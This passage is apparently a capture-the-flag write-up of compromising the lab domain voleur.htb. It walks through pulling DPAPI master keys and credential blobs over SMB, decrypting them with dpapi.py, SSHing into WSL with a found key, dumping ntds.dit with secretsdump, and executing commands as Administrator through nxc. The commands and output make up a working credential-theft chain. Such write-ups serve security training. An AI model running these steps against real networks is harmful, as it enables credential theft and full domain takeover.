smb: \Second-Line Support\> ls
. D 0 Wed Jan 29 10:13:03 2025
.. D 0 Wed Jan 29 04:10:01 2025
Archived Users D 0 Wed Jan 29 10:13:06 2025
5311743 blocks of size 4096. 873443 blocks available
smb: \Second-Line Support\> cd "Archived Users"
smb: \Second-Line Support\Archived Users\> ls
. D 0 Wed Jan 29 10:13:06 2025
.. D 0 Wed Jan 29 10:13:03 2025
todd.wolfe D 0 Wed Jan 29 10:13:10 2025
5311743 blocks of size 4096. 873427 blocks available
smb: \Second-Line Support\Archived Users\> cd todd.wolfe
smb: \Second-Line Support\Archived Users\todd.wolfe\> ls
. D 0 Wed Jan 29 10:13:10 2025
.. D 0 Wed Jan 29 10:13:06 2025
3D Objects DR 0 Wed Jan 29 10:13:06 2025
AppData DH 0 Wed Jan 29 10:13:09 2025
Contacts DR 0 Wed Jan 29 10:13:10 2025
Desktop DR 0 Thu Jan 30 09:28:50 2025
Documents DR 0 Wed Jan 29 10:13:10 2025
Downloads DR 0 Wed Jan 29 10:13:10 2025
Favorites DR 0 Wed Jan 29 10:13:10 2025
Links DR 0 Wed Jan 29 10:13:10 2025
Music DR 0 Wed Jan 29 10:13:10 2025
NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TM.blf AHS 65536 Wed Jan 29 10:13:06 2025
NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Wed Jan 29 07:53:07 2025
NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Wed Jan 29 07:53:07 2025
ntuser.ini AHS 20 Wed Jan 29 07:53:07 2025
Pictures DR 0 Wed Jan 29 10:13:10 2025
Saved Games DR 0 Wed Jan 29 10:13:10 2025
Searches DR 0 Wed Jan 29 10:13:10 2025
Videos DR 0 Wed Jan 29 10:13:10 2025
5311743 blocks of size 4096. 873427 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\>
```
Since we have access to the AppData folder, let's look for the DPAPI files (the user's master keys live under AppData\Roaming\Microsoft\Protect\<SID>).
```
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\> ls
. DS 0 Wed Jan 29 10:13:09 2025
.. DS 0 Wed Jan 29 10:13:09 2025
08949382-134f-4c63-b93c-ce52efc0aa88 A 740 Wed Jan 29 07:53:09 2025
BK-VOLEUR AHS 900 Wed Jan 29 07:53:09 2025
Preferred AHS 24 Wed Jan 29 07:53:09 2025
5311743 blocks of size 4096. 873427 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\> get 08949382-134f-4c63-b93c-ce52efc0aa88
getting file \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88 of size 740 as 08949382-134f-4c63-b93c-ce52efc0aa88 (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
```
We found a master key file; now let's find some credential blobs to use it on.
```
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\> dir
. DSn 0 Wed Jan 29 10:13:09 2025
.. DS 0 Wed Jan 29 10:13:09 2025
772275FAD58525253490A9B0039791D3 An 398 Wed Jan 29 07:55:19 2025
5311743 blocks of size 4096. 873411 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\> get 772275FAD58525253490A9B0039791D3
getting file \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3 of size 398 as 772275FAD58525253490A9B0039791D3 (0.3 KiloBytes/sec) (average 0.5 KiloBytes/sec)
```
Now that we have both a master key file and a credential file, let's use dpapi.py first to decrypt the master key; it is protected with the user's password, which we already know.
```
dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password $PASS
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
```
Next let's use this decrypted key on the credential file.
```
dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : [REDACTED]
```
We’ve recovered another set of credentials!
jeremy.combs:[REDACTED]
Looks like this time we're a member of Third-Line Support Technicians.
```
nxc ldap $DC -u $USER -p $PASS -k -M whoami
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP dc.voleur.htb 389 DC [+] voleur.htb\jeremy.combs:[REDACTED]
WHOAMI dc.voleur.htb 389 DC description: Third-Line Support Technician
WHOAMI dc.voleur.htb 389 DC distinguishedName: CN=Jeremy Combs,OU=Third-Line Support Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Third-Line Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC name: Jeremy Combs
WHOAMI dc.voleur.htb 389 DC Enabled: Yes
WHOAMI dc.voleur.htb 389 DC Password Never Expires: Yes
WHOAMI dc.voleur.htb 389 DC Last logon: 133964947008134262
WHOAMI dc.voleur.htb 389 DC pwdLastSet: 133826370322424800
WHOAMI dc.voleur.htb 389 DC logonCount: 3
WHOAMI dc.voleur.htb 389 DC sAMAccountName: jeremy.combs
```
Continuing the pattern, let's check SMB.
```
echo $PASS | kinit $USER
Password for jeremy.combs@VOLEUR.HTB:
klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: jeremy.combs@VOLEUR.HTB
Valid starting Expires Service principal
07/08/2025 20:32:28 07/09/2025 06:32:28 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 07/09/2025 20:32:27
smbclient //$DC/IT --use-kerberos required --use-krb5-ccache /tmp/krb5cc_1000
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 04:10:01 2025
.. DHS 0 Mon Jun 30 17:08:33 2025
Third-Line Support D 0 Thu Jan 30 11:11:29 2025
5311743 blocks of size 4096. 873059 blocks available
smb: \> cd "Third-Line Support"
smb: \Third-Line Support\> ls
. D 0 Thu Jan 30 11:11:29 2025
.. D 0 Wed Jan 29 04:10:01 2025
id_rsa A 2602 Thu Jan 30 11:10:54 2025
Note.txt.txt A 186 Thu Jan 30 11:07:35 2025
5311743 blocks of size 4096. 873043 blocks available
smb: \Third-Line Support\> get id_rsa
getting file \Third-Line Support\id_rsa of size 2602 as id_rsa (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \Third-Line Support\> get Note.txt.txt
getting file \Third-Line Support\Note.txt.txt of size 186 as Note.txt.txt (0.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
```
We find an id_rsa file and a note.
```
cat Note.txt.txt
Jeremy,
Ive had enough of Windows Backup! Ive part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin
```
It looks like Admin configured WSL and sent Jeremy the id_rsa so he can SSH into the machine; let's try to SSH in.
```
chmod 600 id_rsa
ssh $USER@$DOMAIN -i id_rsa -p 2222
The authenticity of host '[voleur.htb]:2222 ([10.129.110.234]:2222)' cant be established.
ED25519 key fingerprint is SHA256:mKWAEwLTnEN2bJNi7fkc+BZodiXCIiP3ywSLJiZL0ss.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[voleur.htb]:2222' (ED25519) to the list of known hosts.
ADMIN@voleur.htb: Permission denied (publickey).
```
No luck with ADMIN. However, the note also mentions Windows Backup, and there's another account on the machine named svc_backup, which we saw earlier in the xlsx file.
```
ssh $USER@$DOMAIN -i id_rsa -p 2222
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jul 8 17:37:31 PDT 2025
System load: 0.52 Processes: 9
Usage of /home: unknown Users logged in: 0
Memory usage: 28% IPv4 address for eth0: 10.129.110.234
Swap usage: 0%
363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Jan 30 04:26:24 2025 from 127.0.0.1
* Starting OpenBSD Secure Shell server sshd [ OK ]
svc_backup@DC:~$
```
Success! We've authenticated to the WSL instance as svc_backup.
Let's check if there are any Windows backups under /mnt, the default mount point through which WSL exposes the Windows drives.
```
svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/
Backups Note.txt.txt id_rsa
```
There's an additional Backups folder that we couldn't access before; looking around in it we find NTDS.DIT.
```
svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/Backups/Active\ Directory/
ntds.dit ntds.jfm
```
We can also find the registry hives SYSTEM and SECURITY.
```
svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/Backups/registry/
SECURITY SYSTEM
```
Let’s transfer these files over to our box and use secretsdump.py.
```
secretsdump.py -system SYSTEM -ntds ntds.dit -security SECURITY LOCAL
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be[REDACTED]
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:[REDACTED]
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM
0000 06 6A DC 3B AE F7 34 91 73 0F 6C E0 55 FE A3 FF .j.;..4.s.l.U...
0010 30 31 90 0A E7 C6 12 01 08 5A D0 1E A5 BB D2 37 01.......Z.....7
0020 61 C3 FA 0D AF C9 94 4A 01 75 53 04 46 66 0A AC a......J.uS.Ff..
0030 D8 99 1F D3 BE 53 0C CF 6E 2A 4E 74 F2 E9 F2 EB .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
```
We've successfully grabbed the Administrator's credentials from the NTDS file. NTLM is disabled, so instead of the NT hash we use the Administrator's Kerberos AES key, which secretsdump also dumps from ntds.dit (stored here in $HASH).
```
nxc ldap $DC -d $DOMAIN -k -u $USER --aesKey $HASH -k -M whoami
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP dc.voleur.htb 389 DC [+] voleur.htb\ADMINISTRATOR:[REDACTED] (Pwn3d!)
WHOAMI dc.voleur.htb 389 DC description: Built-in account for administering the computer/domain
WHOAMI dc.voleur.htb 389 DC distinguishedName: CN=Administrator,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Group Policy Creator Owners,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Domain Admins,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Enterprise Admins,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Schema Admins,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Administrators,CN=Builtin,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC name: Administrator
WHOAMI dc.voleur.htb 389 DC Enabled: Yes
WHOAMI dc.voleur.htb 389 DC Password Never Expires: Yes
WHOAMI dc.voleur.htb 389 DC Last logon: 133964963798297602
WHOAMI dc.voleur.htb 389 DC pwdLastSet: 133825701137667113
WHOAMI dc.voleur.htb 389 DC logonCount: 109
WHOAMI dc.voleur.htb 389 DC sAMAccountName: Administrator
```
To achieve command execution we can simply use the smb module of the nxc suite.
```
nxc smb $DC -d $DOMAIN -k -u $USER --aesKey $HASH -k -x "dir C:\Users\Administrator\Desktop"
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ADMINISTRATOR:[REDACTED] (Pwn3d!)
SMB dc.voleur.htb 445 dc [+] Executed command via wmiexec
SMB dc.voleur.htb 445 dc Volume in drive C has no label.
SMB dc.voleur.htb 445 dc Volume Serial Number is A5C3-6454
SMB dc.voleur.htb 445 dc Directory of C:\Users\Administrator\Desktop
SMB dc.voleur.htb 445 dc 06/05/2025 03:33 PM <DIR> .
SMB dc.voleur.htb 445 dc 06/05/2025 03:30 PM <DIR> ..
SMB dc.voleur.htb 445 dc 01/29/2025 02:12 AM 2,308 Microsoft Edge.lnk
SMB dc.voleur.htb 445 dc 07/08/2025 12:37 AM 34 root.txt
SMB dc.voleur.htb 445 dc 2 File(s) 2,342 bytes
SMB dc.voleur.htb 445 dc 2 Dir(s) 3,552,526,336 bytes free
```
Just like that, we have Root!
tags: os/windows - diff/medium